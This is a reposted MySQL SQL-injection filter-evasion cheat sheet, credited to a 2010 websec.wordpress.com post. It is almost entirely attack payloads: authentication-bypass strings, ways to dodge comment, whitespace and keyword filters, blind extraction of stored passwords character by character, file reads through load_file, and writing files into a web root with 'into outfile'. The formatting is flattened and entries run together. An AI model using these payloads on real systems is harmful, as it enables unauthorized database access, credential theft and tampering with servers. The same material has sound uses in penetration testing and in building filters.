Basic filter
Comments
‘ or 1=1#‘ or 1=1– –‘ or 1=1/* (MySQL < 5.1)' or 1=1;%00' or 1=1 union select 1,2 as `' or#newline1='1' or– -newline1='1' /*!50000or*/1='1' /*!or*/1='1Prefixes
+ – ~ !‘ or –+2=- -!!!’2Operators
^, =, !=, %, /, *, &, &&, |, ||, , >>, <=, <=, ,, XOR, DIV, LIKE, SOUNDS LIKE, RLIKE, REGEXP, LEAST, GREATEST, CAST, CONVERT, IS, IN, NOT, MATCH, AND, OR, BINARY, BETWEEN, ISNULLWhitespaces
%20 %09 %0a %0b %0c %0d %a0 /**/‘or+(1)sounds/**/like“1“–%a0-‘union(select(1),tabe_name,(3)from`information_schema`.`tables`)#Strings with quotes
SELECT ‘a’SELECT “a”SELECT n’a’SELECT b’1100001′SELECT _binary’1100001′SELECT x’61’Strings without quotes
‘abc’ = 0x616263Aliases
select pass as alias from usersselect pass aliasalias from usersselect pass`alias alias`from usersTypecasting
‘ or true = ‘1 # or 1=1‘ or round(pi(),1)+true+true = version() # or 3.1+1+1 = 5.1‘ or ‘1 # or trueCompare operator typecasting
select * from users where ‘a’=’b’=’c’select * from users where (‘a’=’b’)=’c’select * from users where (false)=’c’select * from users where (0)=’c’select * from users where (0)=0select * from users where trueselect * from usersAuthentication bypass ‘=’
select * from users where name = ”=”select * from users where false = ”select * from users where 0 = 0select * from users where trueselect * from usersAuthentication bypass ‘-‘
select * from users where name = ”-”select * from users where name = 0-0select * from users where 0 = 0select * from users where trueselect * from usersFunction filter
General function filtering
ascii (97)load_file/*foo*/(0x616263)Strings with functions
‘abc’ = unhex(616263)‘abc’ = char(97,98,99)hex(‘a’) = 61ascii(‘a’) = 97ord(‘a’) = 97‘ABC’ = concat(conv(10,10,36),conv(11,10,36),conv(12,10,36))Strings extracted from gadgets
collation(\N) // binarycollation(user()) // utf8_general_ci@@time_format // %H:%i:%s@@binlog_format // MIXED@@version_comment // MySQL Community Server (GPL)dayname(from_days(401)) // Mondaydayname(from_days(403)) // Wednesdaymonthname(from_days(690)) // Novembermonthname(from_unixtime(1)) // Januarycollation(convert((1)using/**/koi8r)) // koi8r_general_ci(select(collation_name)from(information_schema.collations)where(id)=2) // latin2_czech_csSpecial characters extracted from gadgets
aes_encrypt(1,12) // 4h±{?”^c×HéEades_encrypt(1,2) // G/k@@ft_boolean_syntax // + -><()~*:""&|@@date_format // %Y-%m-%d@@innodb_log_group_home_dir // .\Integer representations
false: 0true: 1true+true: 2floor(pi()): 3ceil(pi()): 4floor(version()): 5ceil(version()): 6ceil(pi()+pi()): 7floor(version()+pi()): 8floor(pi()*pi()): 9ceil(pi()*pi()): 10concat(true,true): 11ceil(pi()*pi())+true: 11ceil(pi()+pi()+version()): 12floor(pi()*pi()+pi()): 13ceil(pi()*pi()+pi()): 14ceil(pi()*pi()+version()): 15floor(pi()*version()): 16ceil(pi()*version()): 17ceil(pi()*version())+true: 18floor((pi()+pi())*pi()): 19ceil((pi()+pi())*pi()): 20ceil(ceil(pi())*version()): 21concat(true+true,true): 21ceil(pi()*ceil(pi()+pi())): 22ceil((pi()+ceil(pi()))*pi()): 23ceil(pi())*ceil(version()): 24floor(pi()*(version()+pi())): 25floor(version()*version()): 26ceil(version()*version()): 27ceil(pi()*pi()*pi()-pi()): 28floor(pi()*pi()*floor(pi())): 29ceil(pi()*pi()*floor(pi())): 30concat(floor(pi()),false): 30floor(pi()*pi()*pi()): 31ceil(pi()*pi()*pi()): 32ceil(pi()*pi()*pi())+true: 33ceil(pow(pi(),pi())-pi()): 34ceil(pi()*pi()*pi()+pi()): 35floor(pow(pi(),pi())): 36@@new: 0
@@log_bin: 1!pi(): 0
!!pi(): 1true-~true: 3log(-cos(pi())): 0-cos(pi()): 1coercibility(user()): 3coercibility(now()): 4minute(now())
hour(now())day(now())week(now())month(now())year(now())quarter(now())year(@@timestamp)crc32(true)Extract substrings
substr(‘abc’,1,1) = ‘a’substr(‘abc’ from 1 for 1) = ‘a’substring(‘abc’,1,1) = ‘a’substring(‘abc’ from 1 for 1) = ‘a’mid(‘abc’,1,1) = ‘a’mid(‘abc’ from 1 for 1) = ‘a’lpad(‘abc’,1,space(1)) = ‘a’rpad(‘abc’,1,space(1)) = ‘a’left(‘abc’,1) = ‘a’reverse(right(reverse(‘abc’),1)) = ‘a’insert(insert(‘abc’,1,0,space(0)),2,222,space(0)) = ‘a’space(0) = trim(version()from(version()))Search substrings
locate(‘a’,’abc’)position(‘a’,’abc’)position(‘a’ IN ‘abc’)instr(‘abc’,’a’)substring_index(‘ab’,’b’,1)Cut substrings
length(trim(leading ‘a’ FROM ‘abc’))length(replace(‘abc’, ‘a’, ”))Compare strings
strcmp(‘a’,’a’)mod(‘a’,’a’)find_in_set(‘a’,’a’)field(‘a’,’a’)count(concat(‘a’,’a’))String length
length()bit_length()char_length()octet_length()bit_count()String case
ucaselcaselowerupperpassword(‘a’) != password(‘A’)old_password(‘a’) != old_password(‘A’)md5(‘a’) != md5(‘A’)sha(‘a’) != sha(‘A’)aes_encrypt(‘a’) != aes_encrypt(‘A’)des_encrypt(‘a’) != des_encrypt(‘A’)Keyword filter
Connected keyword filtering
(0)union(select(table_name),column_name,…0/**/union/*!50000select*/table_name`foo`/**/…0%a0union%a0select%09group_concat(table_name)….0’union all select all`table_name`foo from`information_schema`. `tables`OR, AND
‘||1=’1‘&&1=’1‘=’‘-‘OR, AND, UNION
‘ and (select pass from users limit 1)=’secretOR, AND, UNION, LIMIT
‘ and (select pass from users where id =1)=’aOR, AND, UNION, LIMIT, WHERE
‘ and (select pass from users group by id having id = 1)=’aOR, AND, UNION, LIMIT, WHERE, GROUP
‘ and length((select pass from users having substr(pass,1,1)=’a’))OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING
‘ and (select substr(group_concat(pass),1,1) from users)=’a‘ and substr((select max(pass) from users),1,1)=’a‘ and substr((select max(replace(pass,’lastpw’,”)) from users),1,1)=’aOR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT
‘ and substr(load_file(‘file’),locate(‘DocumentRoot’,(load_file(‘file’)))+length(‘DocumentRoot’),10)=’a‘=” into outfile ‘/var/www/dump.txtOR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT, FILE
‘ procedure analyse()#‘-if(name=’Admin’,1,0)#‘-if(if(name=’Admin’,1,0),if(substr(pass,1,1)=’a’,1,0),0)#Control flow
case ‘a’ when ‘a’ then 1 [else 0] endcase when ‘a’=’a’ then 1 [else 0] endif(‘a’=’a’,1,0)ifnull(nullif(‘a’,’a’),1)注:转载自https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/